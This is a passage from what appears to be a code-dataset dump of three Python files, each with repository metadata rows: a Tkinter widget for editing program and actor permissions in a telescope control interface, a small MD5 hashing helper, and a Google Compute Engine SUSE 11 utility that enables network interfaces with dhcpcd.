        self._titleWdgDict.clear()

    def getColActorList(self):
        """Return a list of (col, actor); actor is None for a divider column
        """
        return self._colActorList

    def getActorSet(self):
        """Return the collection of actors as a set"""
        return self._actorSet

    def isSameActors(self, actors):
        """Return True if the set of actors is the same (ignoring order)
        """
        return self._actorSet == set(actors)

    def _getActorCategory(self, actor):
        """Return a category number for a given actor

        Returns one of:
        1: tcc, telmech and tlamps
        2: instruments (the default for unknown actors)
        3: guiders: dcam, ecam, gcam, tcam
        """
        return dict (
            gmech = 1,
            tcc = 1,
            telmech = 1,
            tlamps = 1,
            dcam = 3,
            ecam = 3,
            gcam = 3,
            tcam = 3,
        ).get(actor, 2)

    def __bool__(self):
        """Return True if any actors are known."""
        return len(self._actorSet) > 0

    # Bug fix: this module targets Python 2 (note iteritems etc. elsewhere in
    # the file), where truth testing uses __nonzero__, not __bool__; without
    # this alias "if self._actorList:" was always True even with no actors.
    __nonzero__ = __bool__
class PermsTableWdg(Tkinter.Frame):
    """Table of per-program permissions plus a "Lockout" row.

    Inputs:
    - master        master widget
    - statusBar     status bar to handle commands.
    - readOnlyCallback  a function that is called when the readOnly state changes;
        the function receives one argument: isReadOnly: True for read only, False otherwise.
        Note that isReadOnly always starts out True.
    """
    def __init__(self,
        master,
        statusBar,
        readOnlyCallback = None,
    ):
        Tkinter.Frame.__init__(self, master)
        self._statusBar = statusBar
        self._tuiModel = TUI.TUIModel.getModel()
        self._readOnlyCallback = readOnlyCallback

        self._actorList = ActorList(startCol=1)
        self._progDict = {} # prog name: prog perms
        self._titleWdgSet = []

        # Title (header) row is displayed outside the scrolled area so it
        # stays visible while the program table scrolls.
        self._titleBorder = Tkinter.Frame(self, borderwidth=2, relief="sunken")
        self._titleBorder.grid(row=0, column=0, sticky="ew")
        self._titleBorder.grid_columnconfigure(1, weight=1)
        self._titleFrame = Tkinter.Frame(self._titleBorder, borderwidth=0)
        self._titleFrame.grid(row=0, column=0, sticky="w")
        self._scrollWdg = RO.Wdg.ScrolledWdg(
            master = self,
            hscroll = False,
            vscroll = True,
            borderwidth = 2,
            relief = "sunken",
        )
        self._scrollWdg.grid(row=1, column=0, sticky="nsew")
        self._tableFrame = Tkinter.Frame(self._scrollWdg.getWdgParent(), borderwidth=0)
        # _vertMeasWdg provides the vertical scroll increment (one table row)
        self._vertMeasWdg = Tkinter.Frame(self._tableFrame)
        self._vertMeasWdg.grid(row=0, column=0, sticky="wns")
        self._scrollWdg.setWdg(
            wdg = self._tableFrame,
            vincr = self._vertMeasWdg,
        )
        self.grid_rowconfigure(1, weight=1)

        self._nextRow = 0
        self._readOnly = True
        self._updActorTimer = Timer()

        self.permsModel = TUI.Models.PermsModel.getModel()

        self.permsModel.actors.addCallback(self._updActors)
        self.permsModel.authList.addCallback(self._updAuthList)
        self.permsModel.lockedActors.addCallback(self._updLockedActors)
        self.permsModel.programs.addCallback(self._updPrograms)

        self._lockoutRow = 3
        self._lockoutWdg = _LockoutPerms(
            master = self._titleFrame,
            actorList = self._actorList,
            readOnly = self._readOnly,
            row = self._lockoutRow,
            statusBar = self._statusBar,
        )

        # Clear the table whenever the connection closes
        statusBar.dispatcher.connection.addStateCallback(self.__connStateCallback)

    def purge(self):
        """Remove unregistered programs.
        """
        knownProgs = self.permsModel.programs.get()[0]

        # use items instead of iteritems so we can modify as we go
        for prog, progPerms in self._progDict.items():
            if progPerms.isRegistered() or prog in knownProgs:
                continue
            progPerms.delete()
            del(self._progDict[prog])

    def sort(self):
        """Sort existing programs and redisplay all data.
        """
        # Rebuild the header row from scratch
        self._actorList.clearAllTitleWdg()
        for wdg in self._titleWdgSet:
            wdg.destroy()
        for col, actor in self._actorList.getColActorList():
            if not actor:
                # insert dividor
                self._addTitle(" ", col)
            else:
                titleLabel = self._addTitle(actor, col)
                self._actorList.setTitleWdg(actor, titleLabel)

        self._lockoutWdg.display(row=self._lockoutRow)
        progNames = self._progDict.keys()
        progNames.sort()
        self._nextRow = 0
        for prog in progNames:
            progPerms = self._progDict[prog]
            progPerms.display(row=self._nextRow)
            self._nextRow += 1

    def _addProg(self, prog):
        """Create and display a new program.
        Called when the hub informs this widget of a new program
        (to add a program send the suitable command to the hub,
        don't just call this method).
        """
        prog = prog.upper()
        newProg = _ProgPerms(
            master = self._tableFrame,
            prog = prog,
            actorList = self._actorList,
            readOnly = self._readOnly,
            row = self._nextRow,
            statusBar = self._statusBar,
        )
        self._nextRow += 1
        self._progDict[prog] = newProg

    def _addTitle(self, text, col):
        """Create and grid a title label and two associated
        width measuring frames (one in the title frame, one in the main frame).

        Inputs:
        - text  text for title
        - col   column for title

        Returns the title label
        """
        # print "_addTitle(%r, %r)" % (text, col)
        strWdg = RO.Wdg.StrLabel(
            master = self._titleFrame,
            text = text,
        )
        strWdg.grid(row=0, column=col)
        titleSpacer = Tkinter.Frame(self._titleFrame)
        titleSpacer.grid(row=1, column=col, sticky="new")
        mainSpacer = Tkinter.Frame(self._tableFrame)
        mainSpacer.grid(row=0, column=col, sticky="new")
        self._titleWdgSet += [strWdg, titleSpacer, mainSpacer]

        # The two spacers keep the (separate) title and table columns the
        # same width: whichever is wider forces the other to match.
        def dotitle(evt):
            # print "dotitle: titlewidth = %r, mainwidth = %r" % (
            #    titleSpacer.winfo_width(), mainSpacer.winfo_width(),
            # )
            if titleSpacer.winfo_width() > mainSpacer.winfo_width():
                mainSpacer["width"] = titleSpacer.winfo_width()
        titleSpacer.bind("<Configure>", dotitle)

        def domain(evt):
            # print "domain: titlewidth = %r, mainwidth = %r" % (
            #    titleSpacer.winfo_width(), mainSpacer.winfo_width(),
            # )
            if mainSpacer.winfo_width() > titleSpacer.winfo_width():
                titleSpacer["width"] = mainSpacer.winfo_width()
        mainSpacer.bind("<Configure>", domain)

        return strWdg

    def __connStateCallback(self, conn):
        """If the connection closes, clear all programs from the list.
        """
        if self._progDict and not conn.isConnected:
            for prog, progPerms in self._progDict.items():
                progPerms.delete()
                del(self._progDict[prog])

    def _updActors(self, actors, isCurrent=True, **kargs):
        """Perms list of actors updated.
        """
        # print "%s._updActors(%r)" % (self.__class__, actors,)
        if not isCurrent:
            return
        if self._actorList.isSameActors(actors):
            return

        if not self._readOnly and self._actorList:
            # Briefly disable editing while the new actor columns are built
            self._statusBar.setMsg("Updating actors", severity=RO.Constants.sevWarning, isTemp = True, duration=_NewActorDelay * 1000.0)
            self._setReadOnly(True)
            self._updActorTimer.start(_NewActorDelay, self._setReadOnly, False)
        self._actorList.setActors(actors)

        # Update lockout and each program
        self._lockoutWdg.updateActorList()
        for progPerms in self._progDict.itervalues():
            progPerms.updateActorList()

        # display new header and everything
        self.sort()

    def _updPrograms(self, programs, isCurrent=True, **kargs):
        """Hub's list of registered programs updated.

        Delete old programs based on this info, but don't add new ones
        (instead, look for an authList entry for the new program,
        so we get auth info at the same time).
        """
        if not isCurrent:
            return
        # print "_updPrograms(%r)" % (programs,)

        # raise program names to uppercase
        programs = [prog.upper() for prog in programs]

        if self._tuiModel.getProgID().upper() not in programs:
            # print "my prog=%s is not in programs=%s; currReadOnly=%s" % (prog, programs, self._readOnly)
            self._setReadOnly(True)

        # mark unregistered programs
        anyUnreg = False
        for prog, progPerms in self._progDict.iteritems():
            if prog not in programs:
                # mark progPerms as unregistered
                anyUnreg = True
                progPerms.setRegistered(False)

        # if read only, then automatically purge (if necessary) and sort
        if self._readOnly:
            if anyUnreg:
                self.purge()
            self.sort()

    def _setReadOnly(self, readOnly):
        """Set read only state.
        """
        readOnly = bool(readOnly)
        if self._readOnly != readOnly:
            self._readOnly = readOnly
            # print "toggling readOnly to", self._readOnly
            self._lockoutWdg.setReadOnly(self._readOnly)
            for progPerms in self._progDict.itervalues():
                progPerms.setReadOnly(self._readOnly)
            if self._readOnlyCallback:
                self._readOnlyCallback(self._readOnly)

    def _updAuthList(self, progAuthList, isCurrent=True, **kargs):
        """New authList received.

        progAuthList is:
        - program name
        - 0 or more actorList
        """
        if not isCurrent:
            return
        # print "_updAuthList(%r)" % (progAuthList,)

        prog = progAuthList[0].upper()
        authActors = progAuthList[1:]

        if prog == self._tuiModel.getProgID().upper():
            # this is info about me (my program); check if I can set permissions
            readOnly = "perms" not in authActors
            # print "prog=%s is me; readOnly=%s, currReadOnly=%s, actorList=%s" % (prog, readOnly, self._readOnly, authActors)
            self._setReadOnly(readOnly)

        isNew = prog not in self._progDict
        if isNew:
            # print "program %s is not in program dict; adding" % (prog,)
            self._addProg(prog)

        progPerms = self._progDict[prog]
        progPerms.setRegistered(True)
        progPerms.setCurrActors(authActors)

    def _updLockedActors(self, lockedActors, isCurrent=True, **kargs):
        """Hub's locked actor list updated.
        """
        if not isCurrent:
            return

        self._lockoutWdg.setCurrActors(lockedActors)
class _BasePerms(object):
    """Basic set of permissions.

    Display current locked actorList as a set of checkbuttons.
    Handle read only, help and the action of clicking a button.

    Specialize to handle lockout or programs.

    Inputs:
    - master        master widget
    - actorList     an ActorList
    - row           row at which to grid display widgets
    - statusBar     object to handle commands (via doCmd)
    """
    def __init__(self,
        master,
        actorList,
        readOnly,
        row,
        statusBar,
        prog = "",
        helpSuffix = "",
    ):
        # print "_BasePerms(master=%s, actorList=%s, readOnly=%s, row=%s, prog=%s)" % (master, actorList, readOnly, row, prog)
        self._master = master
        self._actorList = actorList
        self._readOnly = readOnly
        self._row = row
        self._statusBar = statusBar
        self._prog = prog
        self._helpURL = _HelpPrefix + helpSuffix

        self._testWdg = Tkinter.Label(self._master) # to determine current bg color

        # Spacer guarantees a minimum width for the program-name column
        self._nameSpacerWdg = Tkinter.Label(
            master,
            text = "",
            width = _ProgramWidth,
        )
        self._nameSpacerWdg.grid(row=row, column=0)

        self._createNameWdg()

        # dictionary of actor: auth checkbutton entries
        self._actorWdgDict = {}
        self.updateActorList()

    def delete(self):
        """Cleanup
        """
        wdgSet = self._actorWdgDict.values() # all widgets to destroy
        if self._nameSpacerWdg is not None:
            wdgSet.append(self._nameSpacerWdg)
            self._nameSpacerWdg = None
        if self._nameWdg is not None:
            wdgSet.append(self._nameWdg)
            self._nameWdg = None
        self._actorWdgDict = RO.Alg.OrderedDict()
        for wdg in wdgSet:
            wdg.grid_forget()
            wdg.destroy()

    def actorInfoIsConsistent(self):
        # True if the actor checkbuttons match the current ActorList
        return self._actorList.getActorSet() == set(self._actorWdgDict.keys())

    def display(self, row):
        """Display widgets in the specified row.
        If widgets are already displayed, they are first withdrawn.

        Replaces the existing actor order.

        Raises ValueError if the set of actorList does not match.
        """
        # check actorList
        # print "%s.display(row=%s)" % (self, row)
        if not self.actorInfoIsConsistent():
            listActors = sorted(list(self._actorList.getActorSet()))
            dictActors = sorted(self._actorWdgDict.keys())
            raise ValueError("cannot display perms for %s; my actorList %r != %r" % \
                (self, listActors, dictActors))
        self._row = row
        self._nameSpacerWdg.grid_forget()
        self._nameWdg.grid_forget()
        self._nameSpacerWdg.grid(row=self._row, column=0, sticky="ew")
        self._nameWdg.grid(row=self._row, column=0, sticky="ew")
        for col, actor in self._actorList.getColActorList():
            if actor:
                wdg = self._actorWdgDict[actor]
                wdg.grid_forget()
                wdg.grid(row=self._row, column=col)

    def updateActorList(self):
        """The actorList has been updated
        """
        #print "%s.updateActorList()"
        currActorSet = set(self._actorWdgDict.keys())
        newActorSet = self._actorList.getActorSet()
        if currActorSet == newActorSet:
            return

        # ungrid and delete any deleted actorList
        for actor in currActorSet - newActorSet:
            self._actorWdgDict[actor].grid_forget()
            del(self._actorWdgDict[actor])

        # create any new actorList (they will be gridded later as part of display)
        for actor in newActorSet - currActorSet:
            if actor in self._actorWdgDict:
                raise ValueError("%r: actor %r already exists" % (self, actor))

            wdg = _ActorWdg (
                master = self._master,
                prog = self._prog,
                actor = actor,
                readOnly = self._readOnly,
                command = self._actorCommand,
                helpURL = self._helpURL,
            )
            self._actorWdgDict[actor] = wdg
            # bind actor as a default argument so each closure keeps its own actor
            def hl(evt, actor=actor):
                self._doHighlight(evt, actor)
            def unHl(evt, actor=actor):
                self._unHighlight(evt, actor)
            wdg.bind("<Enter>", hl)
            wdg.bind("<Leave>", unHl)

        self.display(self._row)

    def _doHighlight(self, evt, actor):
        # Highlight the actor title, program name and hovered checkbutton
        titleWdg = self._actorList.getTitleWdg(actor)
        if titleWdg:
            titleWdg["background"] = "yellow"
        self._nameWdg["background"] = "yellow"
        evt.widget["background"] = "yellow"

    def _unHighlight(self, evt, actor):
        # Restore the normal background (taken from an unstyled test label)
        titleWdg = self._actorList.getTitleWdg(actor)
        normalBackground = self._testWdg["background"]
        if titleWdg:
            titleWdg["background"] = normalBackground
        self._nameWdg["background"] = normalBackground
        evt.widget["background"] = normalBackground

    def setCurrActors(self, currActors):
        """Sets the list of actorList that should be checked (authorized).

        Inputs:
        - currActors: list of actorList that should be checked
        """
        # print "%s.setCurrActors(%r)" % (self.__class__, currActors)
        for actor, wdg in self._actorWdgDict.iteritems():
            isAuth = actor in currActors
            wdg.setAll(isAuth)

    def setReadOnly(self, readOnly):
        """Update read only state.
        """
        # print "_BasePerms.setReadOnly(%r)" % (readOnly,)
        readOnly = bool(readOnly)
        if self._readOnly != readOnly:
            self._readOnly = readOnly
            # _nameWdg may be a plain label (lockout row) without setReadOnly
            try:
                self._nameWdg.setReadOnly(readOnly)
            except AttributeError:
                pass
            for wdg in self._actorWdgDict.itervalues():
                wdg.setReadOnly(readOnly)

    def _actorCommand(self):
        """Called when an actor button is pressed by hand.
        """
        # print "%s._actorCommand()" % (self.__class__)

        actorList = [
            actor for actor, wdg in self._actorWdgDict.iteritems()
            if wdg.getBool()
        ]
        actorList.sort()
        cmdStr = "%s %s" % (self._getCmdPrefix(), ' '.join(actorList),)
        self._doCmd(cmdStr)

    def _cmdFailed(self, *args, **kargs):
        """Called when a command fails; resets default state."""
        # handle name widget specially; it may not be an active control
        try:
            self._nameWdg.restoreDefault()
        except AttributeError:
            pass
        for wdg in self._actorWdgDict.itervalues():
            wdg.restoreDefault()

    def _getCmdPrefix(self):
        """Return the command prefix"""
        raise NotImplementedError("_createNameWdg must be defined by the subclass")

    def _createNameWdg(self):
        """Create self._nameWdg.
        """
        raise NotImplementedError("_createNameWdg must be defined by the subclass")

    def _doCmd(self, cmdStr):
        """Execute a command.
        """
        cmd = RO.KeyVariable.CmdVar(
            actor = "perms",
            cmdStr = cmdStr,
            callFunc = self._cmdFailed,
            callTypes = RO.KeyVariable.FailTypes,
        )
        self._statusBar.doCmd(cmd)

    def __del__(self):
        self.delete()

    def __repr__(self):
        return "%s" % (self.__class__.__name__)
class _LockoutPerms(_BasePerms):
    """Permission controls for the special "Lockout" row.

    Tracks which actors are locked out, shows that info as one checkbutton
    per actor and sends the appropriate "setLocked" command to the hub when
    a checkbutton is toggled.

    Inputs:
    - master        master widget
    - actorList     a list of the currently known actorList, in desired display order
    - readOnly      True if the user may not change settings
    - row           row at which to grid display widgets
    - statusBar     object to handle commands (via doCmd)
    """
    def __init__(self, master, actorList, readOnly, row, statusBar):
        _BasePerms.__init__(
            self,
            master = master,
            actorList = actorList,
            readOnly = readOnly,
            row = row,
            statusBar = statusBar,
            prog = "",
            helpSuffix = "Lockout",
        )

    def _getCmdPrefix(self):
        """Return the perms command prefix for setting locked actors."""
        return "setLocked"

    def _createNameWdg(self):
        """Create the row label; a plain label because the lockout row
        cannot be deleted, unlike a program row.
        """
        self._nameWdg = RO.Wdg.StrLabel (
            master = self._master,
            text = "Lockout",
            anchor = "center",
            helpText = "lock out non-APO users",
            helpURL = self._helpURL,
        )

    def setCurrActors(self, currActors):
        """Check the locked actors and show the row label with warning
        severity whenever at least one actor is locked out.
        """
        # print "_ProgPerms %s setCurrActors(%r)" % (self, currActors)
        _BasePerms.setCurrActors(self, currActors)
        if currActors:
            newSeverity = RO.Constants.sevWarning
        else:
            newSeverity = RO.Constants.sevNormal
        self._nameWdg.setSeverity(newSeverity)

    def __str__(self):
        return "Lockout"
class _ProgPerms(_BasePerms):
    """Permission controls for a single program.

    Tracks which actors the program may use, shows that info as one
    checkbutton per actor plus a program-name checkbutton (unchecking it
    deletes the program) and sends the appropriate perms commands to the
    hub when a control is toggled.

    Inputs:
    - master        master widget
    - prog          program name
    - actorList     a list of the currently known actorList, in desired display order
    - readOnly      True if the user may not change settings
    - row           row at which to grid display widgets
    - statusBar     object to handle commands (via doCmd)
    """
    def __init__(self, master, prog, actorList, readOnly, row, statusBar):
        # print "_ProgPerms(master=%s, prog=%s, actorList=%s, readOnly=%s, row=%s)" % (master, prog, actorList, readOnly, row)
        _BasePerms.__init__(
            self,
            master = master,
            actorList = actorList,
            readOnly = readOnly,
            row = row,
            statusBar = statusBar,
            prog = prog,
            helpSuffix = "ProgEntry",
        )

    def isRegistered(self):
        """Return True if the desired state of this program is registered,
        False otherwise.
        """
        desiredReg = self._nameWdg.getRegInfo()[1]
        return desiredReg

    def setCurrActors(self, currActors):
        """Update the actor checkbuttons; the program may only be deleted
        while it does not hold the "perms" permission.
        """
        # print "_ProgPerms %s setCurrActors(%r)" % (self, currActors)
        _BasePerms.setCurrActors(self, currActors)
        canUnreg = "perms" not in currActors
        self._nameWdg.setCanUnreg(canUnreg)

    def setRegistered(self, isReg):
        """Set registered or unregistered state.
        """
        # print "%s %s.setRegistered(%r)" % (self._prog, self.__class__, isReg)
        self._nameWdg.setRegistered(isReg)
        for actorWdg in self._actorWdgDict.itervalues():
            actorWdg.setRegInfo(isReg, isReg)

    def _getCmdPrefix(self):
        """Return the perms command prefix for modifying this program."""
        return "set program=%s" % (self._prog,)

    def _createNameWdg(self):
        """Create the name widget: a checkbutton that, when unchecked,
        unregisters (deletes) the program.
        """
        self._nameWdg = _ProgramWdg (
            master = self._master,
            prog = self._prog,
            command = self._progCommand,
            readOnly = self._readOnly,
            helpText = "Uncheck to delete program %r" % (self._prog),
            helpURL = self._helpURL,
        )
        self._nameWdg.addCallback(self._progCallFunc)

    def _progCommand(self):
        """Called when the program name button is pushed by hand;
        sends the register/unregister command to the hub and, when
        re-registering, restores the current permissions as well.
        See also _progCallFunc, which controls actor enabling.
        """
        # print "%s._progCommand" % (self.__class__)
        wantReg = self._nameWdg.getBool()
        cmdVerb = "register" if wantReg else "unregister"
        self._doCmd('%s %s' % (cmdVerb, self._prog))
        if wantReg:
            # re-registering: restore permissions
            self._actorCommand()

    def _progCallFunc(self, wdg=None):
        """Called whenever the program name button toggles (by any means);
        enables or disables the actor checkbuttons to match.
        See also _progCommand, which sends commands to the hub.
        """
        # print "%s._progCallFunc" % (self.__class__)
        actReg, desReg = self._nameWdg.getRegInfo()
        for actorWdg in self._actorWdgDict.itervalues():
            actorWdg.setRegInfo(actReg, desReg)

    def __str__(self):
        return self._prog

    def __repr__(self):
        return "%s(%s)" % (self.__class__.__name__, self._prog)
class _SettingsWdg(RO.Wdg.Checkbutton):
    """Checkbutton used to toggle one setting (an actor permission
    or deletion of a program).

    autoIsCurrent makes the button itself indicate when the displayed
    value differs from the default (the value last reported by the hub).
    """
    def __init__(self,
        master,
        prog,
        readOnly,
        helpURL = None,
    **kargs):
        self._prog = prog
        self._readOnly = readOnly
        RO.Wdg.Checkbutton.__init__(
            self,
            master = master,
            helpURL = helpURL,
            autoIsCurrent = True,
            isCurrent = False,
            **kargs
        )
        # keep the same foreground color when the button is disabled
        self["disabledforeground"] = self["foreground"]
        self._saveActorInfo()
        self._setState()

    def _saveActorInfo(self):
        """Hook for subclasses: record settings needed to
        enable and disable the button appropriately.
        """
        pass

    def setAll(self, val):
        """Set both the current value and the default to val."""
        self.setDefault(val)
        self.set(val)
        self._setState()

    def _setState(self):
        """Hook for subclasses: update appearance and help after a state change."""
        pass

    def setReadOnly(self, readOnly):
        """Update the read-only state; a no-op if the state is unchanged."""
        readOnly = bool(readOnly)
        if readOnly == self._readOnly:
            return
        self._readOnly = readOnly
        self._setState()
class _ActorWdg(_SettingsWdg):
    """Minimal widget to display a checkbutton and a changed indicator.

    This widget has 3 states:
    - read only: user can view permissions but not change anything
    - registered: program is registered and user can change settings
    - not exists: program unregistered so settings disabled
    (read only and unregistered is irrelevant since read only users
    only see registered programs)
    """
    def __init__(self,
        master,
        actor,
        prog,
        readOnly,
        helpURL = None,
    **kargs):
        """Inputs (in addition to _SettingsWdg's):
        - actor: name of the actor this checkbutton controls
        """
        self._actor = actor
        # actual and desired registered state of the owning program;
        # they differ only while a register/unregister command is in flight
        self._actReg = True
        self._desReg = True
        _SettingsWdg.__init__(self,
            master = master,
            prog = prog,
            readOnly = readOnly,
            helpURL = helpURL,
        **kargs)

    def setReadOnly(self, readOnly):
        _SettingsWdg.setReadOnly(self, readOnly)
        # print "%s %s setReadOnly(%r)" % (self._prog, self._actor, readonly)

    def _setState(self):
        """State changed and not transitional; update widget appearance and help.
        """
        isChecked = self.getBool()
        # print "%s %s _ActorWdg._setState; readOnly=%s; isChecked=%s, actReg=%s; desReg=%s" % \
        #   (self._prog, self._actor, self._readOnly, isChecked, self._actReg, self._desReg)
        if self._readOnly:
            # view-only: disable the control and describe the current state;
            # an empty self._prog means this is the lockout row
            self.setEnable(False)

            if self._prog:
                if isChecked:
                    self.helpText = "%s may use %s" % (self._prog, self._actor)
                else:
                    self.helpText = "%s may not use %s" % (self._prog, self._actor)
            else:
                if isChecked:
                    self.helpText = "%s is locked out" % (self._actor,)
                else:
                    self.helpText = "%s is available" % (self._actor,)
            return

        if self._actReg and self._desReg:
            # program fully registered: control is live
            self.setEnable(True)
            if self._prog:
                if isChecked:
                    self.helpText = "%s may use %s; uncheck to prohibit" % (self._prog, self._actor)
                else:
                    self.helpText = "%s may not use %s; check to allow" % (self._prog, self._actor)
            else:
                if isChecked:
                    self.helpText = "%s is locked out; uncheck to unlock" % (self._actor,)
                else:
                    self.helpText = "%s is unlocked; check to lock out" % (self._actor,)
        else:
            # program not registered or in transition, so user cannot change permissions
            self.setEnable(False)
            if not self._desReg:
                self.helpText = "Re-add %s to enable" % (self._prog)
            else:
                self.helpText = "%s being added; please wait" % (self._prog)

    def setRegInfo(self, actReg, desReg):
        """Set the actual and desired registered state of the owning program
        and refresh the widget if either changed.
        """
        actReg = bool(actReg)
        desReg = bool(desReg)
        if (self._desReg, self._actReg) != (desReg, actReg):
            self._actReg = actReg
            self._desReg = desReg
            self._setState()
class _ProgramWdg(_SettingsWdg):
    """Widget showing a program name; toggling it adds/deletes the program.

    When disabled, shows up as a label and help is gone.
    When enabled, shows up as a checkbutton with the text as the button
    (rather than text next to a separate checkbox).
    """
    def __init__(self, *args, **kargs):
        # handle defaults and forced settings
        tuiModel = TUI.TUIModel.getModel()
        self._canUnreg = True  # can program be unregistered? some are fixed
        prog = kargs.get("prog")
        currProg = tuiModel.getProgID()
        # flag the user's own program with a leading asterisk
        isCurrProg = bool(currProg) and currProg.lower() == prog.lower()
        kargs["text"] = ("*" + prog) if isCurrProg else prog
        _SettingsWdg.__init__(self, *args, **kargs)

    def _saveActorInfo(self):
        """Record padding/border settings so the widget can keep the same
        footprint as a flat label when disabled.
        """
        padX = int(str(self["padx"]))
        padY = int(str(self["pady"]))
        bdWidth = int(str(self["borderwidth"]))
        self._enabledPadX = padX
        self._enabledPadY = padY
        self._borderWidth = bdWidth
        # when disabled the border is hidden, so fold it into the padding
        self._disabledPadX = padX + bdWidth
        self._disabledPadY = padY + bdWidth

    def setEnable(self, doEnable):
        """Enable or disable, compensating padding so the text does not shift."""
        _SettingsWdg.setEnable(self, doEnable)
        if doEnable:
            cfg = dict(
                padx = self._enabledPadX,
                pady = self._enabledPadY,
                borderwidth = self._borderWidth,
            )
        else:
            cfg = dict(
                padx = self._disabledPadX,
                pady = self._disabledPadY,
                borderwidth = 0,
            )
        self.configure(**cfg)

    def getRegInfo(self):
        """Returns actReg, desReg
        """
        return (self.getDefBool(), self.getBool())

    def _setState(self):
        """State changed; update widget appearance and help."""
        if self._readOnly:
            self.setEnable(False)
            self.helpText = "Permissions for program %s" % (self._prog,)
        elif not self._canUnreg:
            self.setEnable(False)
            self.helpText = "%s may not be deleted" % (self._prog,)
        else:
            self.setEnable(True)
            actReg, desReg = self.getRegInfo()
            if actReg:
                self.helpText = "%s added; uncheck to delete" % (self._prog,)
            else:
                self.helpText = "%s deleted; check to re-add" % (self._prog,)

    def setRegistered(self, isRegistered):
        """Set both default and current registration state."""
        self.setAll(isRegistered)

    def setReadOnly(self, readOnly):
        """Pass through to the base class."""
        _SettingsWdg.setReadOnly(self, readOnly)

    def setCanUnreg(self, canUnreg):
        """Indicate whether a program can be unregistered or is always registered.
        """
        newVal = bool(canUnreg)
        if newVal == self._canUnreg:
            return
        self._canUnreg = newVal
        self._setState()
if __name__ == "__main__":
    # Standalone demo harness: builds the permissions table driven by canned
    # TestData, with buttons to animate the data and toggle read-only mode.
    import TestData
    root = TestData.tuiModel.tkRoot
    root.resizable(False, True)
    DefReadOnly = False  # initial state of the "Read Only" checkbutton
    statusBar = RO.Wdg.StatusBar(
        master = root,
        dispatcher = TestData.tuiModel.dispatcher
    )
    testFrame = PermsTableWdg(
        master = root,
        statusBar = statusBar,
    )
    testFrame.pack(side="top", expand=True, fill="y")
    testFrame._setReadOnly(DefReadOnly)
    statusBar.pack(side="top", fill="x")
    def doReadOnly(but):
        # callback for the "Read Only" checkbutton below
        readOnly = but.getBool()
        testFrame._setReadOnly(readOnly)
    butFrame = Tkinter.Frame(root)
    Tkinter.Button(butFrame, text="Demo", command=TestData.animate).pack(side="left")
    RO.Wdg.Checkbutton(butFrame, text="Read Only", defValue=DefReadOnly, callFunc=doReadOnly).pack(side="left")
    butFrame.pack(side="top", anchor="w")
    TestData.start()
    root.mainloop()
| 35.472934 | 136 | 0.591465 |
795b02bb7ed00d69eb86ca68665bc6b47a207eb9 | 241 | py | Python | utils/Md5Util.py | junnzhan/spark_learn | 9a53c076a0aaba76d5ce4beacfd6cc7a9bb4faa7 | [
"Apache-2.0"
] | null | null | null | utils/Md5Util.py | junnzhan/spark_learn | 9a53c076a0aaba76d5ce4beacfd6cc7a9bb4faa7 | [
"Apache-2.0"
] | null | null | null | utils/Md5Util.py | junnzhan/spark_learn | 9a53c076a0aaba76d5ce4beacfd6cc7a9bb4faa7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import hashlib
class Md5Util(object):
    """Utility helpers for computing MD5 hex digests.

    Note: MD5 is cryptographically broken; use only for non-security
    purposes such as checksums or cache keys.
    """

    @staticmethod
    def getMd5(raw):
        """Return the 32-character lowercase hex MD5 digest of raw.

        Args:
            raw: data to hash; a str (encoded as UTF-8, as before) or,
                as a backward-compatible generalization, bytes/bytearray
                which are hashed directly.

        Returns:
            str: hexadecimal MD5 digest.
        """
        # Accept binary input directly; text is encoded exactly as before.
        data = raw if isinstance(raw, (bytes, bytearray)) else raw.encode()
        return hashlib.md5(data).hexdigest()
if __name__ == '__main__':
    # quick manual check: print the MD5 digest of the sample string 'jun'
    print(Md5Util.getMd5('jun'))
| 17.214286 | 52 | 0.639004 |
795b02bed7f185bee9b94d466b40a7bc7ea37c74 | 2,227 | py | Python | google_compute_engine/distro/sles_11/utils.py | anilyigitfiliz/compute-image-packages | c1db6992039bdf2ccdcda2ce73adc6cbe8675601 | [
"Apache-2.0"
] | null | null | null | google_compute_engine/distro/sles_11/utils.py | anilyigitfiliz/compute-image-packages | c1db6992039bdf2ccdcda2ce73adc6cbe8675601 | [
"Apache-2.0"
] | null | null | null | google_compute_engine/distro/sles_11/utils.py | anilyigitfiliz/compute-image-packages | c1db6992039bdf2ccdcda2ce73adc6cbe8675601 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities that are distro specific for use on SUSE 11."""
import os
import subprocess
from google_compute_engine import constants
from google_compute_engine.distro import utils
class Utils(utils.Utils):
  """Utilities used by Linux guest services on SUSE 11."""

  def EnableNetworkInterfaces(
      self, interfaces, logger, dhclient_script=None):
    """Enable the list of network interfaces.

    Args:
      interfaces: list of string, the output device names to enable.
      logger: logger object, used to write to SysLog and serial port.
      dhclient_script: string, the path to a dhclient script used by dhclient.
    """
    # eth0 is already managed; only bring up the secondary interfaces.
    secondary = [name for name in interfaces if name != 'eth0']
    if not secondary:
      return
    logger.info('Enabling the Ethernet interfaces %s.', secondary)
    self._Dhcpcd(secondary, logger)

  def _Dhcpcd(self, interfaces, logger):
    """Use dhcpcd to activate the interfaces.

    Args:
      interfaces: list of string, the output device names to enable.
      logger: logger object, used to write to SysLog and serial port.
    """
    for interface in interfaces:
      # First ask any running dhcpcd for this device to exit ('-x').
      try:
        subprocess.check_call(['/sbin/dhcpcd', '-x', interface])
      except subprocess.CalledProcessError:
        # Dhcpcd not yet running for this device.
        logger.info('Dhcpcd not yet running for interface %s.', interface)
      # Then (re)start dhcpcd for the device.
      try:
        subprocess.check_call(['/sbin/dhcpcd', interface])
      except subprocess.CalledProcessError:
        # The interface is already active.
        logger.warning('Could not activate interface %s.', interface)
| 36.508197 | 78 | 0.715761 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.